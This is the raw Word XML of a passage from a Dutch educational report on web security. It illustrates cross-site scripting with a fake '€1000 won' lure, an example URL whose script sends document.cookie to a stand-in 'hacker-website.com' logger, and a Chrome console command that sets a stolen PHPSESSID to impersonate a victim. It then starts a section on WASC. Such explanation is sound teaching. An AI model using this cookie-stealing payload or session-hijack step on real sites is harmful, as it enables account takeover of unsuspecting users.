                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>75142</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2379133" cy="762000"/>
                <wp:effectExtent l="19050" t="0" r="40640" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="460" name="Lint: omhoog gekanteld 460"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2379133" cy="762000"/>
                        </a:xfrm>
                        <a:prstGeom prst="ribbon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7BE1FA" w14:textId="4C04D53A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="009E01CD">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>U heeft €1000 gewonnen!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12F10" id="_x0000_t54" coordsize="21600,21600" o:spt="54" adj="5400,18900" path="m0@29l@3@29qx@4@19l@4@10@5@10@5@19qy@6@29l@28@29@26@22@28@23@9@23@9@24qy@8,0l@1,0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Lint: omhoog gekanteld 460" o:spid="_x0000_s1048" type="#_x0000_t54" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:5.9pt;width:187.35pt;height:6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2E2IsCAABgBQAADgAAAGRycy9lMm9Eb2MueG1srFRLT9wwEL5X6n+wfC/ZLAuUiCxagagqrQAB&#10;FWevY2+i2h7X9m6y/fUdOw8QoB6qXhKPZ+ab1ze+uOy0InvhfAOmpPnRjBJhOFSN2Zb0x9PNl6+U&#10;+MBMxRQYUdKD8PRy+fnTRWsLMYcaVCUcQRDji9aWtA7BFlnmeS0080dghUGlBKdZQNFts8qxFtG1&#10;yuaz2WnWgqusAy68x9vrXkmXCV9KwcOdlF4EokqKuYX0dem7id9secGKrWO2bviQBvuHLDRrDAad&#10;oK5ZYGTnmndQuuEOPMhwxEFnIGXDRaoBq8lnb6p5rJkVqRZsjrdTm/z/g+W3+3tHmqqki1Psj2Ea&#10;h7RuTCgI6BpgS7biJzNBqIpEC+xXa32Bbo/23g2Sx2MsvpNOxz+WRbrU48PUY9EFwvFyfnx2nh8f&#10;U8JRd3aKM0yg2Yu3dT58E6BJPJTUNZsNmHnqLtuvfcCgaD1aoRAT6lNIp3BQImahzIOQWFoMmrwT&#10;qcSVcmTPkA6Mc2FC3qtqVon++gQzGlOaPFLIBBiRZaPUhD0ARMK+x+5zHeyjq0icnJxnf0usd548&#10;UmQwYXLWjQH3EYDCqobIvf3YpL41sUuh23Rp7PnJONMNVAfkgoN+SbzlNw1OYM18uGcOtwL5gZse&#10;7vAjFbQlheFESQ3u90f30R7JilpKWtyykvpfO+YEJeq7QRqf54tFXMskLE7O5ii415rNa43Z6SvA&#10;yeX4pliejtE+qPEoHehnfBBWMSqqmOEYu6Q8uFG4Cv3245PCxWqVzHAVLQtr82h5BI+NjvR66p6Z&#10;swMNAxL4FsaNZMUbKva20dPAahdANomnsdV9X4cR4BonLg1PTnwnXsvJ6uVhXP4BAAD//wMAUEsD&#10;BBQABgAIAAAAIQAS0hPS3QAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGb&#10;3cRgLGk2pRQtCh60ivS4zU6TYHY2ZLZt/PeOJz3Oe4833yuXk+/VCUfuAhlIZwkopDq4jhoDH++P&#10;N3NQHC052wdCA9/IsKwuL0pbuHCmNzxtY6OkhLiwBtoYh0Jrrlv0lmdhQBLvEEZvo5xjo91oz1Lu&#10;e32bJLn2tiP50NoB1y3WX9ujN7A5xNecV8/pw5pfPu+aza5O/JMx11fTagEq4hT/wvCLL+hQCdM+&#10;HMmx6g1kuQRFTmWA2Nn9PAO1FyETRVel/j+g+gEAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsA&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQALbYTYiwIAAGAFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQAS0hPS3QAAAAgBAAAPAAAAAAAAAAAAAAAAAOMEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" adj=",18000" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="237BE1FA" w14:textId="4C04D53A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="009E01CD">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>U heeft €1000 gewonnen!</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3847C780" wp14:editId="324C7763">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2757594</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3817620" cy="512445"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="4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7620" cy="512445"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2ED08DB0" w14:textId="0700D31C" w:rsidR="00CE4BB5" w:rsidRPr="006B40B9" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="006B40B9">
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>http://www.voorbeeld-xss.nl?username</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="006B40B9">
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&lt;/script&gt;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47C780" id="_x0000_s1049" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:217.15pt;margin-top:22.55pt;width:300.6pt;height:40.35pt;z-index:-251579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1r4ycCAAAlBAAADgAAAGRycy9lMm9Eb2MueG1srFPNbtswDL4P2DsIui+OvSRNjThFly7DgO4H&#10;aPcAjCzHQmRRk5TY3dOXUtI0227DdBBIkfxEfiQXN0On2UE6r9BUPB+NOZNGYK3MtuI/Htfv5pz5&#10;AKYGjUZW/El6frN8+2bR21IW2KKupWMEYnzZ24q3Idgyy7xoZQd+hFYaMjboOgikum1WO+gJvdNZ&#10;MR7Psh5dbR0K6T293h2NfJnwm0aK8K1pvAxMV5xyC+l26d7EO1suoNw6sK0SpzTgH7LoQBn69Ax1&#10;BwHY3qm/oDolHHpswkhgl2HTKCFTDVRNPv6jmocWrEy1EDnenmny/w9WfD18d0zVFZ/MCs4MdNSk&#10;R7nz4QA7VkR+eutLcnuw5BiGDzhQn1Ot3t6j2HlmcNWC2cpb57BvJdSUXx4js4vQI46PIJv+C9b0&#10;DewDJqChcV0kj+hghE59ejr3Rg6BCXp8P8+vZgWZBNmmeTGZTNMXUL5EW+fDJ4kdi0LFHfU+ocPh&#10;3oeYDZQvLvEzj1rVa6V1Utx2s9KOHYDmZJ3OCf03N21YX/HraTFNyAZjfBqhTgWaY626is/H8cRw&#10;KCMbH02d5ABKH2XKRJsTPZGRIzdh2AypE/ksBkfuNlg/EWEOj3NLe0ZCi+4XZz3NbMX9zz04yZn+&#10;bIj063wyiUOelMn0KtLlLi2bSwsYQVAVD5wdxVVIi5H4sLfUnLVKvL1mcsqZZjHRedqbOOyXevJ6&#10;3e7lMwAAAP//AwBQSwMEFAAGAAgAAAAhAL8eQkjfAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxM&#10;j8FOwzAMhu9IvENkJG4s3bqiqTSdJiYuHJDYkOCYNWlTkThRknXl7fFOcPstf/r9udnOzrJJxzR6&#10;FLBcFMA0dl6NOAj4OL48bIClLFFJ61EL+NEJtu3tTSNr5S/4rqdDHhiVYKqlAJNzqDlPndFOpoUP&#10;GmnX++hkpjEOXEV5oXJn+aooHrmTI9IFI4N+Nrr7PpydgE9nRrWPb1+9stP+td9VYY5BiPu7efcE&#10;LOs5/8Fw1Sd1aMnp5M+oErMC1uW6JJRCtQR2BYqyqoCdKK2qDfC24f9/aH8BAAD//wMAUEsBAi0A&#10;FAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54&#10;bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJl&#10;bHNQSwECLQAUAAYACAAAACEA8c1r4ycCAAAlBAAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEAvx5CSN8AAAALAQAADwAAAAAAAAAAAAAAAAB/BAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAIsFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="2ED08DB0" w14:textId="0700D31C" w:rsidR="00CE4BB5" w:rsidRPr="006B40B9" w:rsidRDefault="00CE4BB5">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="006B40B9">
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>http://www.voorbeeld-xss.nl?username</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="006B40B9">
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&lt;/script&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D763E" w14:textId="6525A98A" w:rsidR="00161B65" w:rsidRDefault="006B40B9" w:rsidP="0012150A">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70E5EE2B" wp14:editId="4ABC2DC5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2351405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>91440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="389467" cy="262467"/>
                <wp:effectExtent l="0" t="19050" r="29845" b="42545"/>
                <wp:wrapNone/>
                <wp:docPr id="466" name="Pijl: rechts 466"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="389467" cy="26246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BE1409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 rechts 466" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:185.15pt;margin-top:7.2pt;width:30.65pt;height:20.6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oRMewIAAEUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFOGzEQvVfqP1i+l03SECBigyIQVSUE&#10;EVBxNl4768rrccdONunXd+zdLAhQD1VzcMaemeeZt298frFrLNsqDAZcycdHI86Uk1AZty75j8fr&#10;L6echShcJSw4VfK9Cvxi8fnTeevnagI12EohIxAX5q0veR2jnxdFkLVqRDgCrxw5NWAjIm1xXVQo&#10;WkJvbDEZjWZFC1h5BKlCoNOrzskXGV9rJeOd1kFFZktOtcW8Yl6f01oszsV8jcLXRvZliH+oohHG&#10;0aUD1JWIgm3QvINqjEQIoOORhKYArY1UuQfqZjx6081DLbzKvRA5wQ80hf8HK2+3K2SmKvl0NuPM&#10;iYY+0sr8tHOGStYxsHROLLU+zCn4wa+w3wUyU8s7jU36p2bYLjO7H5hVu8gkHX49PZvOTjiT5JrM&#10;JskmlOIl2WOI3xQ0LBklR7Ou4xIR2syq2N6E2CUcAik7ldQVka24tyrVYd290tQSXTvJ2VlM6tIi&#10;2wqSgZBSuTjuXLWoVHd8PKJfX9WQkWvMgAlZG2sH7B4gCfU9dldrH59SVdbikDz6W2Fd8pCRbwYX&#10;h+TGOMCPACx11d/cxR9I6qhJLD1DtacPjtBNQvDy2hDjNyLElUCSPg0JjXO8o0VbaEsOvcVZDfj7&#10;o/MUT4okL2ctjVLJw6+NQMWZ/e5Iq2fj6TTNXt5Mj08mtMHXnufXHrdpLoE+05geDi+zmeKjPZga&#10;oXmiqV+mW8klnKS7Sy4jHjaXsRtxejekWi5zGM2bF/HGPXiZwBOrSUuPuyeBvpddJL3ewmHsxPyN&#10;7rrYlOlguYmgTRblC6893zSrWTj9u5Ieg9f7HPXy+i3+AAAA//8DAFBLAwQUAAYACAAAACEAqg0x&#10;xN8AAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7KhTkiYoxKkAqRIPIeiD&#10;vRsPcUQ8jmK3DX/PsILl6B7de6ZaTq4XRxxD50nBfJaAQGq86ahVsNuurm5AhKjJ6N4TKvjGAMv6&#10;/KzSpfEnWuNxE1vBJRRKrcDGOJRShsai02HmByTOPv3odORzbKUZ9YnLXS+vkySXTnfEC1YP+GCx&#10;+docnILnHb11+Xuh7+3L9LHePr2u3GNU6vJiursFEXGKfzD86rM61Oy09wcyQfQK0iJJGeUgy0Aw&#10;kKXzHMRewWJRgKwr+f+D+gcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBjUoRMewIAAEUF&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCqDTHE3wAA&#10;AAkBAAAPAAAAAAAAAAAAAAAAANUEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA4QUA&#10;AAAA&#10;" adj="14322" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD12F4D" w14:textId="71C1B31A" w:rsidR="00367610" w:rsidRPr="00D22C48" w:rsidRDefault="00367610" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="3D0A5AD6" w14:textId="77777777" w:rsidR="009E01CD" w:rsidRDefault="009E01CD" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E01CD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>FIGUUR 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A34C62" w14:textId="03BC21A0" w:rsidR="00D47336" w:rsidRDefault="00FC70A3" w:rsidP="00C41D9B">
      <w:r>
        <w:t>Zodra de</w:t>
      </w:r>
      <w:r w:rsidR="003275CC">
        <w:t xml:space="preserve"> niets vermoedende</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gebruiker </w:t>
      </w:r>
      <w:r w:rsidR="00B66F62">
        <w:t>erop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> klikt wordt de sessie ID weggeschreven naar een tekstbestand op het systeem van de hacker.</w:t>
      </w:r>
      <w:r w:rsidR="00643005">
        <w:t xml:space="preserve"> De verzamelde sessie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00643005">
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidR="008674AF">
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00643005">
        <w:t xml:space="preserve"> kan de hacker vervolgens gebruiken om </w:t>
      </w:r>
      <w:r w:rsidR="008674AF">
        <w:t>toegang te krijgen tot</w:t>
      </w:r>
      <w:r w:rsidR="00E7110A">
        <w:t xml:space="preserve"> de accounts van de slachtoffers</w:t>
      </w:r>
      <w:r w:rsidR="008674AF">
        <w:t>. De hacker doet dit door zijn eigen sessie ID te ve</w:t>
      </w:r>
      <w:r w:rsidR="004E5290">
        <w:t>randeren in die van zijn slachtoffer</w:t>
      </w:r>
      <w:r w:rsidR="008674AF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000805C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12158565" w14:textId="4807F1F8" w:rsidR="00D47336" w:rsidRPr="00D47336" w:rsidRDefault="00D47336" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47336">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cookies veranderen in Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C2DA3" w14:textId="73DA9221" w:rsidR="00C803C6" w:rsidRDefault="00ED6652" w:rsidP="00C41D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C75B388" wp14:editId="1B415F48">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3919855" cy="736600"/>
            <wp:effectExtent l="25400" t="0" r="42545" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="194" name="Diagram 1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14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C803C6">
        <w:t>Met de Console van Chrome kun je in Javascript de cookies veranderen van waarden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F6135" w14:textId="635C9EE6" w:rsidR="009831D6" w:rsidRPr="00F12D3B" w:rsidRDefault="0088533B" w:rsidP="00C41D9B">
      <w:r w:rsidRPr="00F12D3B">
        <w:t>Javascript commando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F3525C" w14:textId="7348C182" w:rsidR="0088533B" w:rsidRPr="00F12D3B" w:rsidRDefault="00565A42" w:rsidP="00C41D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CB4764B" wp14:editId="6F31B847">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4275455" cy="405765"/>
                <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="19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5455" cy="405765"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="36E0CA79" w14:textId="0FBC98E4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>document.cookie</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">=”PHPSESSID= </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="222222"/>
                                <w:sz w:val="18"/>
                                <w:szCs w:val="18"/>
                              </w:rPr>
                              <w:t>3sq0eglfrjpqiqemu3k27t5r82</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B4764B" id="_x0000_s1050" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.65pt;width:336.65pt;height:31.95pt;z-index:2517411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kbDygCAABOBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L7YMeymMeIUXboMA7oL&#10;0O4DaFmOhciSJimxu68fJadpdnsZ5geBFKlD8pD06mbsJTly64RWFZ3PUkq4YroRalfRr4/bN9eU&#10;OA+qAakVr+gTd/Rm/frVajAlz3SnZcMtQRDlysFUtPPelEniWMd7cDNtuEJjq20PHlW7SxoLA6L3&#10;MsnS9CoZtG2M1Yw7h7d3k5GuI37bcuY/t63jnsiKYm4+njaedTiT9QrKnQXTCXZKA/4hix6EwqBn&#10;qDvwQA5W/AbVC2a1062fMd0num0F47EGrGae/lLNQweGx1qQHGfONLn/B8s+Hb9YIhrs3bKgREGP&#10;TXrke+ePsCdZ4GcwrkS3B4OOfnyrR/SNtTpzr9neEaU3Hagdv7VWDx2HBvObh5fJxdMJxwWQevio&#10;GwwDB68j0NjaPpCHdBBExz49nXvDR08YXubZosgLTJGhLU+LxVURQ0D5/NpY599z3ZMgVNRi7yM6&#10;HO+dD9lA+ewSgjktRbMVUkbF7uqNtOQIOCfb+J3Qf3KTigwVXRZZMRHwV4g0fn+C6IXHgZeir+j1&#10;2QnKQNs71cRx9CDkJGPKUp14DNRNJPqxHqeWLUKEQHKtmydk1uppwHEhUei0/U7JgMNdUfftAJZT&#10;Ij8o7M5ynudhG6KSF4sMFXtpqS8toBhCVdRTMokbHzcoEmdusYtbEQl+yeSUMw5t5P20YGErLvXo&#10;9fIbWP8AAAD//wMAUEsDBBQABgAIAAAAIQDLbeKg2QAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1s&#10;TI9Bb8IwDIXvk/YfIiNxQSMdVbupa4oGEqedKOweGq+taJwuCVD+/bzTdnv2s56/V64nO4gr+tA7&#10;UvC8TEAgNc701Co4HnZPryBC1GT04AgV3DHAunp8KHVh3I32eK1jKziEQqEVdDGOhZSh6dDqsHQj&#10;EntfzlsdefStNF7fONwOcpUkubS6J/7Q6RG3HTbn+mIV5N91uvj4NAva33cb39jMbI+ZUvPZ9P4G&#10;IuIU/47hF5/RoWKmk7uQCWJQwEUib1MQbOYvKYsTi2wFsirlf/rqBwAA//8DAFBLAQItABQABgAI&#10;AAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsB&#10;Ai0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsB&#10;Ai0AFAAGAAgAAAAhAHQ5Gw8oAgAATgQAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1s&#10;UEsBAi0AFAAGAAgAAAAhAMtt4qDZAAAABQEAAA8AAAAAAAAAAAAAAAAAgAQAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPMAAACGBQAAAAA=&#10;">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="36E0CA79" w14:textId="0FBC98E4" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>document.cookie</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">=”PHPSESSID= </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="222222"/>
                          <w:sz w:val="18"/>
                          <w:szCs w:val="18"/>
                        </w:rPr>
                        <w:t>3sq0eglfrjpqiqemu3k27t5r82</w:t>
                      </w:r>
                      <w:r>
                        <w:t>”</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="501571BE" w14:textId="77777777" w:rsidR="00651FA8" w:rsidRPr="00F12D3B" w:rsidRDefault="00651FA8" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397E2749" w14:textId="65910CAD" w:rsidR="004A780D" w:rsidRDefault="000A4C5D">
      <w:r>
        <w:t xml:space="preserve">Bij het uitvoeren van deze commando </w:t>
      </w:r>
      <w:r w:rsidR="008E50BA">
        <w:t>kan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de hacker</w:t>
      </w:r>
      <w:r w:rsidR="004A780D">
        <w:t xml:space="preserve"> zich nu</w:t>
      </w:r>
      <w:r w:rsidR="008E50BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E50BA" w:rsidRPr="008E50BA">
        <w:t>proble</w:t>
      </w:r>
      <w:r w:rsidR="008E50BA">
        <w:t>emloos</w:t>
      </w:r>
      <w:r w:rsidR="004A780D">
        <w:t xml:space="preserve"> voordoen als andere gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE0ED1" w14:textId="777466F6" w:rsidR="008C0FFD" w:rsidRPr="008E50BA" w:rsidRDefault="008C0FFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E50BA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B43ECA" w14:textId="0DFAD829" w:rsidR="0089139C" w:rsidRPr="00273C52" w:rsidRDefault="00FA5D91" w:rsidP="00FA5D91">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc491022062"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.2.3 </w:t>
      </w:r>
      <w:r w:rsidR="0089139C" w:rsidRPr="00273C52">
        <w:t>WASC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="18AC08EC" w14:textId="73AD0AEE" w:rsidR="004B55A6" w:rsidRPr="00F12D3B" w:rsidRDefault="007C1416" w:rsidP="00C41D9B">
      <w:r w:rsidRPr="00F12D3B">
        <w:t>De Web Application Security</w:t>
      </w:r>
      <w:r w:rsidR="00F12D3B" w:rsidRPr="00F12D3B">
        <w:t xml:space="preserve"> Consortium </w:t>
      </w:r>
